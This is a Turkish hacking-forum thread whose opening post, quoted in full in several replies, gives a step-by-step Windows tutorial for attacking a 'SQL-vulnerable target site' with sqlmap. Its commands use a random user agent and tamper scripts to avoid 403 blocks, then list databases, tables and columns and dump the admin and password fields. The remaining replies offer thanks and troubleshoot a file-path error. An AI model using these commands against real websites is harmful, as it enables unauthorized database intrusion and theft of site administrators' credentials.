CMD İle SQL Injection Hack [Windows] - Site Hackleme / OBT İs HerYerDe

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,498
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

 
Son düzenleme:

ByTurkX

Üye
15 Kas 2021
211
201
18
Vatan
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Database İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.
 

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,498
Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.

Teşekkürler.

Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.

CMD'yi Tercih Edenler İçin Hazırlanmıştır.
 

awesofc

Katılımcı Üye
18 Tem 2021
648
341
25
sanal ortam :)
çok işime yariyacak teşekur ederim

belirten dosya bulamiyor hatasi veriyor
Rw3rqzDP.png
 

CasPeRAB

Uzman üye
7 Kas 2021
1,146
461
TR❤AZ
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

Vayyy güzel ve net olmuş elleriniz sağlık
 

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,498

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,498

egemizah

Katılımcı Üye
19 Şub 2021
864
429
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

elinize sağlık
 

Mertoktay5

Üye
5 Ara 2021
227
95
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

(y)
 

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,024
1,053
16
Konya Ovası Askeri Tesislerinde
Dosyalar & Tool




+ Python 3.10.1 adlı setup ile Python kuruyoruz
+
sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+
sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız



sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:
cd ../../



Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:
cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:
python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump



Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀ

Dostum eline sağlıkta artık sqlmap eskidi , daha iyi açıkları anlatsan port , dom ,xss sömürülmesi en zor olan açık?
 

1wexter1

Katılımcı Üye
24 Eyl 2021
921
647
Uzayda1yer
Öncellikle eline sağlık.

bende önceden sqlmap-master yüklüydü onu sildim senin
verdiğin dosyayı indirdim dediğin şeyleri yaptım
"cd ../../" bunu yaptım sonra "cd sqlmap" yaptım o da oldu ama sonra
"python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs " yazdım sonra şu hatayı verdi

"python: can't open file 'C:\\sqlmap\\sqlmap.py': [Errno 2] No such file or directory" nerede yalnış yaptım?
 

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,498
Öncellikle eline sağlık.

bende önceden sqlmap-master yüklüydü onu sildim senin
verdiğin dosyayı indirdim dediğin şeyleri yaptım
"cd ../../" bunu yaptım sonra "cd sqlmap" yaptım o da oldu ama sonra
"python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs " yazdım sonra şu hatayı verdi

"python: can't open file 'C:\\sqlmap\\sqlmap.py': [Errno 2] No such file or directory" nerede yalnış yaptım?

DM'den Ekran Görüntüsü Atabilir Misin Dostum? Daha Detaylı Görmek İstiyorum.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.